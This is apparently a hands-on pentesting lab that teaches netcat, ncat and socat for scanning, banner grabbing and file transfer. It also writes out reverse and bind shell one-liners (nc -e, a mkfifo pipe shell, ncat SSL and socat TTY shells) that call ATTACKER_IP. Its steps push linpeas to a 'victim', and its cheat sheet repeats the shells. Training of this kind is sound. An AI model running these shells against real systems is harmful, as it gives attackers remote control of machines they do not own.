๐ฏ Lab Objectives
- Understand what netcat does and why every hacker needs it
- Use nc for port scanning and banner grabbing
- Transfer files between machines using nc
- Set up a listener and catch reverse shells
Think of netcat as a raw network pipe. It can connect to or listen on any TCP/UDP port and pass data through โ making it useful for practically everything in networking and security.
Step 1 โ What is Netcat?
# Check netcat version on Kali
nc --version
nc -h
# Two main modes:
# CLIENT: nc [IP] [PORT] โ connect to something
# SERVER: nc -l -p [PORT] โ listen for connections
# Two common versions:
# Traditional nc (netcat-traditional) โ has -e flag
# OpenBSD nc โ no -e flag (safer)
# ncat (from nmap project) โ supports SSL, IPv6
Step 2 โ Port Scanning
# Scan a single port
nc -zv 192.168.1.1 80
# Scan a range of ports
nc -zv 192.168.1.1 20-1000
# Scan UDP ports
nc -zvu 192.168.1.1 53
# Flags:
# -z โ zero I/O mode (just scan, don't send data)
# -v โ verbose (shows open/closed)
# -u โ UDP mode
# -w 1 โ timeout after 1 second
# Quick scan with timeout
nc -zv -w 1 192.168.1.1 1-1024 2>&1 | grep succeeded
Step 3 โ Banner Grabbing
# Connect and see what the service says
nc 192.168.1.1 22 # SSH banner
nc 192.168.1.1 21 # FTP banner
nc 192.168.1.1 25 # SMTP banner
# Manual HTTP request
nc 192.168.1.1 80
GET / HTTP/1.0
Host: 192.168.1.1
(press Enter twice)
# The response will include the Server header:
# Server: Apache/2.4.41 (Ubuntu)
# SMTP banner grab
nc mail.example.com 25
EHLO test
(this reveals the mail server software and version)
Step 4 โ Chat / Listener
# Simple two-machine chat
# Machine A โ listen
nc -lvnp 1234
# Machine B โ connect
nc 192.168.1.10 1234
# Now anything typed on either side appears on the other
# Keep listener open after disconnect (for catching multiple shells)
while true; do nc -lvnp 4444; done
Step 5 โ File Transfer
# Send a file from attacker to victim
# Receiver first:
nc -lvnp 9999 > received_file.txt
# Sender:
nc 192.168.1.10 9999 < file_to_send.txt
# Transfer a directory (with tar)
# Receiver:
nc -lvnp 9999 | tar xvf -
# Sender:
tar cvf - /path/to/dir | nc 192.168.1.10 9999
# Transfer a binary (linpeas, tools etc.)
# On Kali (sender):
nc -lvnp 8080 < /usr/share/peass/linpeas.sh
# On victim (receiver):
nc KALI_IP 8080 > linpeas.sh && chmod +x linpeas.sh
Step 6 โ Bind & Reverse Shells
# Reverse shell โ victim connects to attacker
# Attacker listens:
nc -lvnp 4444
# Victim connects back (needs nc with -e flag):
nc ATTACKER_IP 4444 -e /bin/bash
# Bind shell โ attacker connects to victim
# Victim opens shell on a port:
nc -lvnp 4444 -e /bin/bash
# Attacker connects:
nc VICTIM_IP 4444
# If nc doesn't have -e (OpenBSD version):
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f
Step 7 โ Ncat & Socat
# ncat โ nmap's modern netcat with SSL support
# Encrypted listener
ncat --ssl -lvnp 4444
# Encrypted reverse shell
ncat --ssl ATTACKER_IP 4444 -e /bin/bash
# Allow multiple connections
ncat -lvnp 4444 --keep-open
# socat โ more powerful than netcat
# Full TTY reverse shell (best shell quality)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Victim:
socat tcp-connect:ATTACKER_IP:4444 exec:bash,pty,stderr,setsid,sigint,sane
๐ Netcat Cheat Sheet
| Task | Command |
|---|---|
| Listen on port | nc -lvnp 4444 |
| Connect to port | nc 192.168.1.1 80 |
| Port scan | nc -zv 192.168.1.1 1-1000 |
| Send file | nc TARGET 9999 < file.txt |
| Receive file | nc -lvnp 9999 > file.txt |
| Reverse shell (catch) | nc -lvnp 4444 |
| Bind shell (connect) | nc VICTIM 4444 |
| Pipe shell | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4444 >/tmp/f |
Lab Complete! Netcat is in almost every CTF solution and pentest report. Practice using it daily until it feels natural.